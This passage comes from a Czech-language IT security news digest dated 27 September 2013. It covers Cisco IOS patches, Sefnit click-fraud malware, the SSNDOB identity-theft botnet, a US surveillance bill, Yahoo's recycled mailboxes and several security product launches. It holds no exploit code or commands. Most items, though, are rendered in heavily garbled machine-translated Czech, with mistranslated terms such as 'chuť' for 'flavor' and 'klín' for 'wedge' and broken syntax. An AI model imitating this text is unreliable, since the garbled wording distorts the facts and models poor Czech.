zpravodajskými Surveillance Act, který zakazuje zpravodajské služby používat sběrná orgány zaměřené na cizince provádět neoprávněným vyhledávání pro telefonní hovory a e-maily jednotlivých Američanů. V současné době, Mezera v zákoně známém jako "zadní vrátka", vyhledá mezera umožňuje vládě, aby konec se bude točit kolem tradičních ústavních rozkazu ochran. Návrh zákona bude také zakázat sbírání komunikací, které jsou "o" cíl spíše než do nebo z tohoto cíle mimo terorismu souvislostech a posílí ochranu proti zaměření cizince za účelem získání komunikaci Američanů bez soudního příkazu - ". vzad cílení" proces známý jako berouce na vědomí negativní vliv tyto tajné programy dozoru a právní výklady měli na amerických společností, které se poskytnout záznamy pro zpravodajské komunity v rámci těchto stanov, návrh zákona dává těmto společnostem možnost zveřejňovat více informací o jejich spolupráci s aktivitami vládních dozoru.
Cisco IOS aktualizace opravy Osm Chyby 27.9.2013 Zranitelnosti cisco_patchesCISCO IOS AKTUALIZACE ZÁPLAT OSM SLABÁ Telekomunikační společnost Cisco tento týden varoval zákazníky, a těch, kteří vedou jejich software osmi samostatných zranitelností to záplatované ve svém operačním systému IOS (Internetwork) infrastruktury výrobku.
Cisco Security Incident Response produktu Team (PSIRT) vydala včera upozorňováni na sekci Zabezpečení Intelligence Operations svých internetových stránkách.
Více než polovina z rad řešit odmítnutí služby zabezpečení, které vyplývají z toho, jak je program konfigurován. Chyby zahrnují Network Time Protocol (NTP), funkce virtuální fragmentace montáží (VFR), funkce pro IPv6, přístup k síti (NAT), funkce, T1/E1 řidič fronty a DCHP realizace IOS. Všechny mohl - za správných okolností - mohlo neověřenému vzdálenému hacker způsobit stav DoS, a to buď zasláním upraveného paketů na zařízení, nebo jak se přístroj znovu načíst bez souhlasu uživatele.
Ostatní tři chyby zahrnují různé součásti zařízení.
Jedním z nich je vázána na Zone-Based Ios "Firewall (ZBFW) funkčností. ZBFW nesprávně zpracovává některé typy paketů protokolu HTTP, pokud je přístroj "nakonfigurován buď pro Cisco IOS Content Filtering nebo HTTP Brána aplikační vrstvy kontrolu." Všechno hacker by musel udělat, je poslat škodlivé pakety HTTP pomocí zařízení k využívání.
Druhá se týká problém v aplikaci Internet ios "Key Exchange (IKE), funkce, která by mohla vést k nevracení paměti a zařízení reload. Stejně jako ZBFW vuln IKE nesprávně zpracovává chybně IKE pakety. Některé speciálně vytvořenou IKE pakety může způsobit, že software není uvolnit přidělené paměti, následkem čehož dochází k nevracení paměti.
Konečně, klín chyba v protokolu RSVP (Resource rezervace) funkce umožňují hackerovi spustit "rozhraní fronty klín" na postiženém zařízení, které může vést ke ztrátě spojení, ztráta směrovacího protokolu a v některých případech, stav DoS . Rozhraní fronta klín je více či méně zranitelnost, kde jsou přijaté pakety do fronty a IOS, ale nikdy odebrána z fronty, dusí zařízení a způsobuje, že přestane fungovat.
Zatímco řešení jsou k dispozici u tří z osmi zranitelnosti, NTP zranitelnosti, klín zranitelnosti a zranitelnosti T1/E1 Cisco vydala bezplatné aktualizace softwaru, které lék všechny otázky IOS.
Všechny aktualizace jsou k dispozici na Cisco Security odpovědí a upozornění, a doložky a ty nasazení aktualizací jsou požádáni, aby přehodnotily své software, než záplatování je zajistit, aby jejich aktuální konfigurace bude i nadále podporována.
Cisco IOS běží na milionech počítačů po celém světě a je v podstatě sbírka směrovače, přepínače a funkcí, které jsou závislé na společnosti síťového systému. Je to podruhé v letošním roce Cisco vydala velkou dávku záplat pro produkt. Společnost také vytlačila sedm záplat pro software na konci března .
čas na změnu v přemýšlení o bezpečnosti, říkají odborníci 27.9.2013 Hacking WASHINGTON -Security, jako spousta jiných věcí, má tendenci jít v několika fázích. Nový útok technika se vyvíjí, výrobci reagují s novou defenzivní technologií, a pak útočníci najít způsob, jak ho porazit. Vždy to tak bylo. A právě teď, věci se zdají být v jednom z těchto pravidelných dolů cyklů, při kterých útočníci mají navrch.
V minulosti to, co pomohlo prolomit tento cyklus je inovace, nové technologie nebo architektura, která umožňuje houpání věci zpět v opačném směru. Alespoň dočasně. Bezpečnostní manažeři u některých větších finančních institucí a provozovatelů sítí na světě, mluví na panelu zde ve středu řekl, že nastal čas pro další takové probuzení.
"Myslím, že jsme v bezpečnostním říje právě teď," řekl Ed Amoroso, šéf bezpečnosti na AT & T, řekl během panelové diskuse na summitu Cybersecurity Billington.
Problém po ruce je, že zatímco útočníci byli přizpůsobuje a mění své postupy a metody rychle v průběhu několika posledních let, obranné společenství teprve musí dohnat a provést změny potřebné k obnovení zdání pořádku. Útočníci, jako ti za nově objevené Icefog útoku , mají navrch v mnoha ohledech, v neposlední řadě z nich je v tom, že luxus času, aby sle své cíle, naučit ležel na zemi a najít slabá místa, které potřebují dostat dovnitř bezpečnostních týmů, i dobře organizované a zkušenější, jsou v nevýhodě v této rovnici. I když je útok objeven v procesu, je to někdy těžké říct, co bylo přijato, jak dlouho útočníci měli přístup k síti a které stroje byly ohroženy.
Jak maxim jde, útočníci musí být pouze jednou doprava, zatímco obránci mít pravdu celou dobu.
Změna tohoto stavu věcí se nestane přes noc a cesta k tomuto cíli rozhodně není bez překážek. To může vyžadovat změny některých základních procesů a systémů, které byly pilíři bezpečnostní infrastruktury po celá desetiletí. Ověření, například. Zvažoval foundational technologie tak dlouho, jak počítače byly kolem, může ověřování přežily svou užitečnost.
"V mém světě, ověřování, není slovo, které jsme použili už ne," řekl Charles Blauner, globální vedoucí informační bezpečnosti v Citi, který byl součástí panelu Billington. "Je čas se pohnout dál. Pro nás, přemýšlíme, pokud jde o uznání spíše než ověřování. Je to o tom mít systém říkat, 'já poznávám ", a jít od toho."
Jedna z věcí, která byla opěvována jako oprava ověřování problému je biometrická technologie. Myšlení jde, že vyžaduje, aby uživatel použít heslo i něco jako otisk prstu nebo sken duhovky je mnohem obtížnější pro útočníka vydávat se za něj. Nicméně, ne všechny biometrie stvořeni sobě rovni, Amoroso řekl.
"Existují dvě varianty biometrie. Jedním z nich je chuť, kam ukládáte otisk lokálně na zařízení a používá se tam, "řekl. "Chuť B, budete mít biometrický a odeslat ji na drát a je uložena v centrální databázi. Poté, co projde drátu, může být ohrožena. A nemůže být změněna. Takže myslím, že chuť je dobrá, ale chuť B potřebuje nějakou práci. "
Změna přichází pomalu v oblasti bezpečnosti, ale to může být čas, aby věci urychlit.
Bdělý Aktualizace softwaru a jeho informační řešení ochrany
27.9.2013 Aktualizace | Bezpečnost
Bděte Software vydala RightsWATCH 5.0, který rozšiřuje bezpečný tok informací v organizaci a automaticky uplatňovat podnikové zásady zabezpečení, aniž by uživatelé museli učinit rozhodnutí nebo dělat práci navíc. Tím je zajištěno, že utajované informace mohou být použity platnými uživateli kdekoliv, i když jsou mimo bezpečné perimetru sítě a používání BYOD zařízení.
"Bděte vybudovala velmi pěkné řešení na vrcholu práv Microsoft Management (RMS) platformy. Bděte klasifikace a rozšíření pro správu zásad na serveru RMS a jeho aplikací Microsoft Office klientem dobře integrovaný, a poskytují několik důležitých funkcí pro uživatele i IT správcům pomoci urychlit přijetí, usnadnění nasazení a chrání stále širší rozsah dat v podniku, "vysvětluje Dan Plastina, Microsoft Rights Management Services správce skupiny. "Myriad úniku dat události nám ukázaly, že je to prostě nestačí k zajištění perimetru sítě. S příchodem Bring Your Own Device technologie, jako jsou chytré telefony a tablety, schopnost kontrolovat hraniční sítě a omezit tak informace mohou jít, je prakticky mrtvý, "vysvětluje Rui Melo Biscaia, ředitel vývoje produktů v pozorným Software. "RightsWATCH 5.0 dále rozšiřuje schopnost produkovat a konzumovat Microsoft RMS chráněného obsahu na širokou škálu mobilních zařízení, nyní zpřístupňuje plně vybavený e-mailový klient pro Android OS zařízení, jakož i stávající iOS a Blackberry platformy, "přidal Biscaia. Nejnovější verze RightsWATCH data-centric Protection Suite podporuje bezpečnou spolupráci v moderním podniku, rozšířením interoperabilitu mezi RMS a SharePoint pro povinné klasifikaci dat a ochranu, stejně jako použití dynamicky obsah a kontext povědomí DLP pravidel na e-maily, i když jsou vytvořeny pomocí aplikace Outlook Web rozhraní pro přístup. Ve shodě s verzemi Microsoft a cestovní mapy, RightsWATCH je nyní plně kompatibilní s nejaktuálnější verzí systému Windows, Office, SharePoint a Windows Server.
Uživatelé chtějí bezproblémovou práci ve veřejné Wi-Fi
27.9.2013 Bezpečnost | It
S smartphone a tablet použití pokračující exploze, provozovateli nasazen Wi-Fi sítě hrají stále větší roli v udržování uživatelé připojení na cestách. Nová studie provedené v Evropě jménem Wi-Fi Alliance uvádí, že pokročilé funkce, jako bezproblémové ověřování na místě zápis přídavných zařízení a bezplatné Wi-Fi roaming přítomné subjektům přesvědčivé možností, jak řídit obchodní hodnotu. Průzkum provedený mezi více než 2000 uživatelů z obou smartphonů a tabletů ve Francii, Německu, Švédsku a Spojeném království, ukazuje touhu mezi uživateli pro více bezproblémové praxe ve veřejných sítí Wi-Fi. Respondenti dostali popis bezproblémové uživatelské zkušenosti zapnutým Wi-Fi CERTIFIED Passpoint zařízení. Mezi zjištění:
Osmdesát čtyři procent respondentů mají zájem o bezproblémovou zjišťování a ověřování v hotspotů Sedmdesát čtyři procent jsou ochotni přejít poskytovatele služeb, aby bylo možné získat přístup k těmto pokročilými funkcemi Devadesát jedna procent je pravděpodobné, že zůstat u svého současného poskytovatele služeb, pokud oni nabídli službu, která začlenila tyto funkce. "Passpoint zařízení již přináší hodnotu pro provozovatele, a tato hodnota zvyšuje Wi-Fi se stává ústředním pevných a mobilních služeb poskytovatele obchodních strategií," řekl Wi-Fi Alliance prezident a generální ředitel Edgar Figueroa. "Wi-Fi Alliance rozšiřuje Passpoint dodat ještě více pokročilé funkce pro uspokojení důležitých subjektů podnikatelské záměry do budoucna." Dopravce Wi-Fi příležitost výrazně přesahuje smartphonů. Tablet použití v domácnostech a na veřejných Wi-Fi sítí je na vzestupu a blížící se sazbami, které jsou podobné smartphone použití. Podle studie, více než třetina uživatelů připojit tablet k veřejným sítím Wi-Fi ještě dnes a padesát sedm procent uvedlo, že očekávají, že jejich tablet připojit přes hotspot sítě tří let od teď. další vydání Passpoint, které je plánováno 2014, přidává funkce umožňující non-SIM přístroje zápis na místě, rozšíření uživatelských odběrů dalších zařízení, jako jsou tablety, a umožňuje zapisování nových předplatitelů. Seamless Wi-Fi roaming je v současné době v mnoha studiích u poskytovatelů služeb po celém světě, a představuje další příležitost pro poskytovatele služeb. Devadesát dva procent respondentů připojit buď tablet nebo smartphone na cestách, využití kombinace buněčné a Wi-Fi sítí uvnitř i vně svého domovského poskytovatele služeb řízení. Padesát osm procent respondentů uvedlo, že by byli ochotni platit více za Wi-Fi roaming nabídku od svého poskytovatele, a osmdesát procent souhlasil s tvrzením "Přál bych si můj poskytovatel služeb mohl být se mnou, když jsem cestovat." "S inovacemi pocházející z průmyslu, příležitost pro pokročilé Wi-Fi řídit obchodní hodnoty pro poskytovatele služeb je jasné, "řekl Mike Roberts, hlavní analytik společnosti Informa Telecoms & Media. "Passpoint certifikované zařízení a mezi poskytovatele Wi-Fi roaming umožňuje pevné a mobilní poskytovatelé přidat nové Wi-Fi pouze pro předplatitele, rozšířit podíl na peněžence mezi stávajícími účastníky, a doručit cestovní zážitek, který předčí očekávání účastníka."
Výzvy, kterým čelí nejvyšší občanské společnosti 27. září 2013. IT (ISC) 2 vydala nové údaje, které popisuje šéf problémy, kterým čelí top manažery podnikové bezpečnosti a ilustruje širokou škálu složité - a někdy i protichůdných - výzvy, kterým čelí dnešní podnikových vůdců informační bezpečnosti.
Některé klíčové paradoxy studie CXO nalezeno patří: Aplikační chyby byly top-hodnocené hrozbou pro bezpečnost podnikových dat (72 procent vedoucích pracovníků hodnocených jako hlavní obavy), ale mnoho manažerů rovněž uvedla, že požadavky jejich organizací ztěžují vývoj a implementaci bezpečných postupů pro vývoj aplikací. Podobně 70 procent vedoucích pracovníků hodnocených mobilních zařízení jako top hrozbu pro své organizace, ale mnozí uvedlo, že není úspěšně proveden mobilní bezpečnostní politiky a programy. Drtivá většina bezpečnostních manažerů (77 procent ve vládě a 63 procent v soukromém sektoru) věří, že mají příliš málo lidí na jejich IT bezpečnosti pracovníků, ale 61 procent citovaný obchodní podmínky jako překážku pro přijetí do zaměstnání více pracovníků. Přes obavy, které registrovaných přes nedostatek školeného personálu, další bezpečnostní manažeři plánují zvýšit výdaje na technologie v příštím roce (39 procent) než u zaměstnanců (35 procent). Nová zpráva ", pohled z vrcholu - (ISC) 2 Globální informační bezpečnosti zaměstnanců Studie CXO zpráva," nabízí detailní pohled na postoje a plány 1634 C-úrovni vedení z podniků po celém světě. Studie nabízí snímek plánů priority a obavy špičkových bezpečnostních manažerů v celé řadě průmyslových odvětví -. A výzvám, kterým čelí při rozhodování v dnešním dynamickém, turbulentním prostředí kybernetické bezpečnosti "Vedoucí bezpečnostní manažeři, zdá se, jsou stále odbočil z klíčových bezpečnostních otázek, na dosah ruky, když vyrovnával tlak vyvíjející se hrozeb a podnikání, "řekl John Colley, generální ředitel (ISC) 2 EMEA. "Uznávají aplikace zranitelnost je číslo jedna hrozba, a přesto jsou schopni věnovat svůj čas, pozornost a jasné vedení v této oblasti k nápravě situace. Je nutné, aby udržet strategickou perspektivu v oblasti bezpečnosti, při pohledu na problematiku komplexně s cílem vytvořit efektivní řešení se vypořádat s problémy, jejichž povaha se neustále mění. " Zpráva údaje naznačují, že špičková bezpečnostní manažeři čelí celá plejáda kritických, ale někdy paradoxní, bezpečnostní volby. Například CXOs řekl, že dva ze svých hlavních zájmů kybernetické bezpečnosti jsou potenciálními škodami na pověst organizace (83 procent) a IT služeb prostoje (74 procent). Přesto, když se ptal, jak tráví svůj čas, horní dvě odpovědi byly správy, řízení rizik a dodržování (Gr, 74 procent), a řízení bezpečnosti (74 procent), což znamená, že administrativní úkoly a priority ovládat své každodenní agendy. "Bezpečnost je Dilema pro manažery bezpečnosti informací, "uvedl Michael Suby, Stratecast viceprezident výzkumu na Frost & Sullivan a autor zprávy. "Údaje se rozrůstá a stává se více tekutin, a přesto, že je třeba chránit, je větší než kdy jindy. Podobně, tam je problém dnešních sofistikovaných útočníků, kteří jsou stále obratně skrývat své hrdinské činy. Nejvýznamnější hrozbou pro organizaci je to, co neví, nebo nemůže odhalit. " "Je jasné, že hlavní bezpečnostní manažeři potýkají s řadou problémů, které nelze překonat žádným jednotné metodiky nebo sadu řešení," uvedl William Stewart , viceprezident společnosti Booz Allen Hamilton. "Jednou z největších překážek čelit bezpečnostním oddělení je dynamická souhra mezi organizace podnikání a IT priority a rychle se měnící povaze hrozeb prostředí. K překonání tohoto problému, CXOs třeba se zaměřit na priority kritických aktiv, úzce spolupracuje s ostatními organizační vedení a řízení promyšlené a perspektivní analýzy hrozeb. "
Krádež Nový Click podvodům Malware Souvisí Tor Botnet 27. září 2013. Viry | Hacking tor_clickfraudKRADMÝ NEW CLICK PODVODŮM MALWARE SOUVISÍ TOR BOTNET Malware rodina, pravděpodobně vyvinutý stejných autorů, kteří vybudovali masivní botnet nedávno objevil na síti Tor , byl oživen s kradmý nové click-podvod podvod.
Microsoft hlásí vyrážku nových podvodná kliknutí činnosti spojené s Sefnit malware, který byl myšlenka mrtvá a pohřbená v roce 2011, Microsoft Malware Protection Center výzkumník Geoff McDonald napsal v blogpost tento týden. McDonald řekl, Microsoft objevil nový podvodná kliknutí komponenty do Sefnit malware v červnu, jeden, který používá open source 3proxy projektu. Původně Microsoft uvedl, že klasifikovala podvodná kliknutí část Sefnit jako Mevade malware, ale nyní je považuje za stejné rodiny.
"Botnet z Sefnit hostovaných serverů proxy se používá k přenosu HTTP předstírat, kliknout na reklamu," řekl McDonald.
Použití proxy udržuje hladinu hluku dolů na Sefnit činnosti, na rozdíl od předchozích verzí malware, který by unést kliknutí z výsledků vyhledávání, posílá ty prokliky přes agenturu na webovou stránku, připomínající uživatele určení.
"Tato kliknutí jsou obecně považovány za poměrně vysokou hodnotu a je těžké odhalit podvody z pohledu," řekl McDonald.
Tam nebylo nic zastavit pozorný uživatele, nicméně, od všiml, že se nejedná přistáli na stránky, které hledali a předložení otázce bezpečnostní výzkumník, uvedl Microsoft. Nežádoucí pozornost, odborníci si myslel, způsobil Sefnit gang zavřít krám.
V červnu byl malware znovu nalézt funguje jako proxy služby na 3proxy.
"Nová verze Sefnit nevykazuje žádné zřetelné viditelné příznaky uživatele upozornit na botnet," řekl McDonald. "To jim umožnilo vyhnout pozornost od antimalware vědců za pár let."
Botnet serverů proxy se odesílá požadavky, nebo falešné prokliky, prostřednictvím sítě affiliate programy, jako je vyhledávání Mywebsearch [.] Com a oprávněné reklamní agentury, aby nakonec podvádět legitimní inzerenta.
Společnost Microsoft poskytuje příklad použití Groupon. V Sefnit autoři pravděpodobně Mywebsearch pobočka, a používat službu proxy přesměrovat provoz na affiliate na "falešné" kliknutím na reklamu na Google Groupon místě, šidit Groupon v tomto procesu. Prodejce musí platit společnosti Google za falešné kliknutí, Google má svůj podíl a následně vyplatí zbytek na Mywebsearch affiliate.
Chcete-li zachovat podvod trvale, malware autoři vybudovali časové prodlevy do systému tak, aby se malware nebude příliš často klikněte na reklamy, varování proti podvodům služby.
Microsoft uvedl, že Trojan Sefnit se šíří podél legitimní instalací aplikace File Scout, také vyvinutého Sefnit gangu.
"Konkrétně se předpokládá, že podobnou formátu XML strukturu pro C a C-stáhnout a provádět příkazy, jsou obě aplikace distribuovány, a dvě aplikace byly zpracovány 15 minutách po sobě se stejným překladačem," řekl McDonald.
Sefnit se šíří také na některých softwarových instalaci InstallBrain Bundler a přes eMule peer-to-peer sítě.
"Autoři přizpůsobily své mechanismy klikání způsobem, který bere v interakci uživatele z obrazu při zachování efektivity," řekl McDonald. "Toto odstranění uživatelského interakce závislosti na metodice klikání byl velký faktor v Sefnit autoři budou moci zůstat mimo radarů zabezpečením výzkumných pracovníků v průběhu posledních několika let."
Mevade mezitím způsobil rozruch v polovině srpna, kdy odborníci uvědomili počet uživatelů Tor vyletěla z 500.000 na téměř 3 miliony, a spekuloval, že botnet se usídlil v síti a botmaster se používat ke komunikaci s ohrožen hostitelé a vyhnout se potenciálním takedown pokusy.
Rozhodnutí přejít na Tor, nicméně, byl jeho zkázou. Odborníci Damballa Labs uvedl, že příliv uživatelů Tor přitáhl nežádoucí pozornost k botnetu vedoucí k jeho odhalení. Výzkumník Mark Gilbert řekl Threatpost že botmaster byl pravděpodobně pronájmu části botnet Mevade pro click-podvod, adware podvody a dokonce i datové průsaků.
Identity Prodávající používá Botnet ukrást z dat makléřů 27. září 2013. Bezpečnost | BotNet ssndobIDENTITA PRODÁVAJÍCÍ POUŽÍVÁ BOTNET UKRÁST Z DAT MAKLÉŘŮ Online prodavač čísla sociálního pojištění, úvěrů a zprávy pozadí a další informace cenné pro zloději identity se zdá, že zjištěné tato data by byly ohroženy systémy řady významných firem dat zprostředkování, podle vyšetřovací zprávy vydané bezpečnostní reportér Brian Krebs .
Na webových stránkách je SSNDOB [dot] MS a Krebs charakterizuje jako "službu krádeže identity." Koho je zodpovědný za službu Zpráva uvádí,, ohrožení a instalaci botnet malware o systémech řady významných datových firem, včetně dvou serverů v právních LexisNexis databáze firem, další dva servery na Dun & Bradstreet, New Jersey-based sběratele firemní licensure informací, a pětinu serveru patří do screeningového zaměstnání pozadí společnost s názvem Kroll pozadí America Inc
Malware infikované servery přenášet data z těchto systémů na velení a řízení serveru pod kontrolou provozovatele SSNDOB je, dodávat určité množství informací prodávané na tomto webu. Krebs běžel vzorků malwaru prostřednictvím Virus Total, webové stránky, který skenuje škodlivé soubory vidět, které antivirové produkty se odhalit, na začátku září. Žádný z 46 nástrojů používaných Virus Total zjištěna hrozba. V publikaci, Krebs řekl, že celková stoupl na šest z 46 nástrojů.
Přes léto, místo bylo ohroženo, což Krebs a ostatním přístup do celé databáze. Zkoumání této databáze bylo zjištěno, že na místě nějaké 1.300 zákazníkům, že strávil stovky tisíc dolarů shromažďování SSNs, data narození, řidičský průkaz, záznamy a úvěry a ověřením informace o více než čtyři miliony amerických občanů.
Zdrojové kódy všech těchto údajů zůstal neznámý až do skupiny hackerů zřejmě spojené s UGNazi hacktivist kolektivní použité SSNDOB narůstat data pro jiné webové stránky, exponované [dot] su, který vydává různé informace o celebrit a významných osobností veřejného života. Beyonce, Jay-Z, první dáma Michelle Obama, ředitel CIA John Brennan, a bývalý ředitel FBI Robert Mueller patří mezi osoby, jejichž informace lze nalézt na webových stránkách, v souladu s Krebs. Informace na této stránce zvýrazněny druhé důkladností SSNDOB v přístupu k citlivým informacím, ale to nebylo dokud ne místo bylo později ohrožena, že Krebs byl schopen posoudit celou databázi.
Kromě statistických informací, kompromis SSNDOB dal Krebs schopnost analyzovat síťovou aktivitu tam, což ho vedlo k existenci botnet vyostřuje služby.
SSNDOB běží již dva roky, nabízí osobní informace jako SSNs a porodní záznamy pro mezi 50 centů a 2,50 dolary a kreditní ověřením informací pro mezi $ 5 až 15 dolarů, podle zprávy.
Krebs píše, že LexisNexus potvrdil kompromis, Dun & Bradstreet řekl Krebs informace, kterou poskytl "velmi užitečné" a Kroll Background americká mateřská společnost Altegrity, ani nepotvrdil, ani nevyvrátil kompromis. Všechny tři společnosti jsou koordinaci s policií a FBI je "vědoma a případ vyšetřuje."
Vedle IP kamer chce Axis ovládnout i přístupová řešení
27. září 2013. Hardware Axis představil síťovou dveřní jednotku A1001 s vestavěným webovým rozhraním a podle svých slov tak vstupuje na trh přístupových systémů.
Jednotka A1001 je prý prvním neproprietárním ovladačem přístupu založeným na otevřeném IP protokolu. Je základem pro dvě různá řešení – prvním je Entry Manager (AXIS A1001 s vestavěným softwarem), jenž je vhodný pro malé až střední provozy – jako například kanceláře, malé firmy a obchody – s typicky 10 dveřmi a základními požadavky na kontrolu přístupu.
Druhé je určeno pro větší podnikové systémy, kdy je A1001 vhodná díky otevřenému rozhraní pro programování aplikací. To umožňuje partnerům Axisu pro vývoj aplikací (ADP – Application Development Partners) plnit různé požadavky konkrétních zákazníků na funkcinalitu.
V první fázi se do vývoje řešení, jež zahrnují integraci videa a vyspělé funkce pro řízení kontroly přístupu zapojili tito partneři: Aimetis, Genetec, IMRON, Milestone, NextLevel a OnSSI.
Na trhu se jednotka objeví ve 4. čtvrtletí 2013, a to nejprve ve Spojených státech. Daslší země budou následovat. Podle analytické firmy IHS má celosvětový trh se systémy pro kontrolu fyzického přístupu hodnotu přibližně 3 miliardy dolarů (2012) a do roku 2017 jeho hodnota vzroste zhruba na 4,2 miliardy, což představuje průměrný roční nárůst ve výši 7 procent.
„Posunutí inovace produktů do oblasti kontroly fyzického přístupu je ve vývoji Axisu přirozeným krokem vzhledem k tomu, že mezi kontrolou přístupu a dohledovým videem existuje velmi silné propojení. Trh s produkty pro kontrolu fyzického přístupu nyní dospěl na práh, kdy dojde k jeho posunu k otevřené IP technologii,“ řekl Ray Mauritsson, prezident a CEO společnosti Axis Communications.
Další vlastnosti síťové dveřní jednotky A1001 podle výrobce:
Otevřená architektura, která umožňuje snadnou integraci video systémů, detekce narušení chráněného prostoru a dalších systémů. Podpora pro napájení přes datovou síť (protokol Power over Ethernet) s cílem snížit nutnost používat oddělené napájecí a datové kabely. Údaje o držitelích karet a konfigurace systémů se automaticky ukládají a synchronizují mezi jednotlivými ovladači a jednotky je možné administrovat z jakéhokoli počítače v rámci systému. Lze využít jako „samostatné“ řešení s jednou jednotkou pro každé dveře a s pevnou cenou na jedny dveře. Umožňuje libovolnou rozšiřitelnost a není nutné používat tradiční centrální ovladač, který obsluhuje vždy více dveří najednou - 4, 8, 16 nebo 32 dveří. Podpora pro většinu stávajících protokolů čteček a jejich typů a pro standardní IT a bezpečnostní zařízení, jako jsou například dveřní zámky a senzory polohy dveří. Průvodce instalací a barevně odlišené konektory pomáhají uživatelům provést instalaci snadno a ověřit, zda jsou dveřní zámky, čtečky a další zařízení připojena správně. API rozhraní je vytvořeno tak, aby splňovalo specifikace ONVIF Profile C, což umožní vzájemnou spolupráci klientských míst a zařízení systémů pro kontrolu fyzického přístupu (PACS – physical access control systems) a IP video systémů.
Eset vylepšil NOD32 – třeba o detekci šifrovaného malwaru
27. září 2013. Ochrana Nové verze svých klíčových bezpečnostních řešení pro domácnosti a SOHO představil Eset. Jde o varianty NOD32 Antivirus 7 a Smart Security 7.
Mezi nové funkce, které uživatelům nabídnou, patří například blokování zranitelností, pokročilá kontrola paměti nebo pokročilá ochrana na sociálních sítích.
Podle Esetu současní kyberzločinci často vytvářejí zašifrovaný, těžko odhalitelný malware, takže se musela změnit i obrana. V případě řešení Esetu jde třeba o komponentu Exploit Blocker, která chrání před cílenými, negenerickými webovými útoky malwaru, eliminuje zamykání obrazovky, GPcode či ransomware. Blokování se zaměřuje na nejčastější typy útoků na internetové prohlížeče, PDF čtečky, e-mailové klienty nebo MS Office.
Funkce Advanced Memory Scanner a Vulnerability Shield zase zastavují silně šifrované hrozby, jejichž cílem je vyhnout se odhalení. Prvně jmenovaná představuje rozšíření technologie Host-based Intrusion-Prevention System (HIPS), která provádí hloubkové skenování paměti počítače v reálném čase a umožňuje efektivní prevenci před infekcí i v případech, v nichž se malware snaží skrývat šifrováním.
Funkce Vulnerability Shield funguje na úrovni sítě a chrání před zneužitím známých zranitelností v síťových protokolech.
„Již ve zkušební fázi produktů verze 7 a při využití funkce Advanced Memory Scanner jsme byli schopni rozpoznat a shromáždit řadu vzorků patřících mezi typy malwaru, které často způsobují uživatelům problémy. Tím je například Win32/TrojanDowloader.Wauchos pracující jako přenašeč dalších malwarových infekcí, backdoory Win32/Fynloski, Win32/Wigon ,Win32/Zbot, nebo červ Win32/Spatet*. V neposlední řadě se také prokázalo, že nové produkty pomáhají chránit před ransomware trojany,“ říká Juraj Malcho, ředitel výzkumu Esetu.
Tato vylepšení pomáhají při odhalování šifrovaného malwaru. Nové produkty mají také vestavěný modul, jenž odstraňuje nutnost používat speciální čistící nástroje a další doplňky.
S ohledem na nárůst spamu a malwaru zaměřeného na sociální sítě obsahuje sedmá verze produktů Esetu i vylepšenou funkci Social Media Scanner. Ta monitoruje a udržuje v bezpečí na sociálních sítích nejen účet samotného uživatele, ale i jeho přátele.
Uživateli umožňuje automatické nebo jednorázové skenování určené k odhalení případných hrozeb. Kromě lepší kontroly Facebooku je ochrana nově rozšířena i na Twitter.
Součástí tohoto nástroje je Centrum zabezpečení, které zobrazuje aktuální úroveň ochrany osobních údajů na Facebooku a Twitteru, případně navrhuje změny v nastavení soukromí.
Do recyklovaných schránek Yahoo chodí cizí zprávy
27. září 2013. Bezpečnost Plán společnosti Yahoo recyklovat nepoužívané e-mailové schránky dopadl podle očekávání katastrofou. Noví vlastníci uvolněných e-mailových adres dostávají zprávy, které nepatří jim, ale předchozím majitelům obnovené adresy.
Tom Jenkins, bezpečnostní expert a majitel jednoho ze recyklovaných e-mailů řekl webu Information Week, že mu chodí cizí e-maily plné velmi citlivých informací.
Společnost své plány na recyklaci e-mailů neaktivních déle než rok oznámila v červnu a už tehdy se začali ozývat experti na bezpečnost a soukromí, kterým se tento nápad zdál nedomyšlený. Nyní se ukazuje, že měli pravdu.
Experti na společnost apelují, aby problém vyřešila okamžitě, a v Yahoo tvrdí, že provedli řadu opatření, aby strachu o soukromé zabránili a problémy vyřešili. „Předtím, než jsme účty recyklovali, jsme se jejich původní majitele snažili zastihnout několika různými způsoby. Snažili jsme se všechny upozornit, že je potřeba se na svůj účet přihlásit, pokud o něj mají stále zájem,“ řekl jeden z představitelů Yahoo. „Provedli jsme řadu opatření, abychom si byli jisti, že změna proběhne bezpečně. Všechna soukromá data původních vlastníků jsme smazali a odesílatelům jsme posílali automatické odpovědi alespoň 30 – 60 dnů, abychom jim dali vědět, že účet již neexistuje. E-maily jsme také odhlásili ze všech komerčních sdělení.“
V dohledné době plánuje Yahoo spustit funkci „Toto není můj e-mail“, pomocí které budou uživatelé moci nahlásit zprávy, které nejsou určeny jim. Tento proces je však jen malou útěchou předchozímu majiteli účtu, který nyní patří Jenkinsovi. „Mohl bych získat přístup k jejich účtu na Pandoře, ale neudělám to. Mohl bych změnit přístupové údaje jejich Facebooku, ale neudělám to. Znám jejich jména, adresu i telefonní číslo. Vím, kam chodí jejich děti do školy. Znám minimálně čtyři číslice jejich sociálního pojištění. Vím, že měli minulý týden schůzku s očním lékařem a že jsou pozvaní na svatbu přátel,“ sdělil Jenkins.
I další uživatelé nahlásili, že dostávají zprávy s osobními informacemi cizích lidí.
„Doporučuji přihlašovat se na Yahoo účet každých šest měsíců. Jedině tak budete vědět, zda máte nad účtem stále kontrolu,“ řekl bezpečnostní expert Lee Munson. Podle expertů na soukromí a bezpečnost se Yahoo tomuto problému nemohl vyhnout. „Upozorňovali na to již dávno, když Yahoo svůj záměr poprvé oznámil. Společnost kritiku a obavy ignorovala a teď se ukazuje, že byly obavy na místě,“ řekl Mike Rispoli, mluvčí organizace Privacy International.
„Recyklování e-mailů a snaha odstrčit staré uživatele a přilákat nové končí tak, že některá z našich nejintimnějších dat mohou skončit v rukou cizích lidí,“ dodal. „Mluvíme o heslech k různým účtům, o kontaktech na přátele a rodinu, zdravotní záznamy a další. Tento problém musí být opraven okamžitě. Tedy, pokud se Yahoo zajímá o své uživatele a pokud chce, aby společnosti ještě někdo někdy své soukromé informace svěřili.“
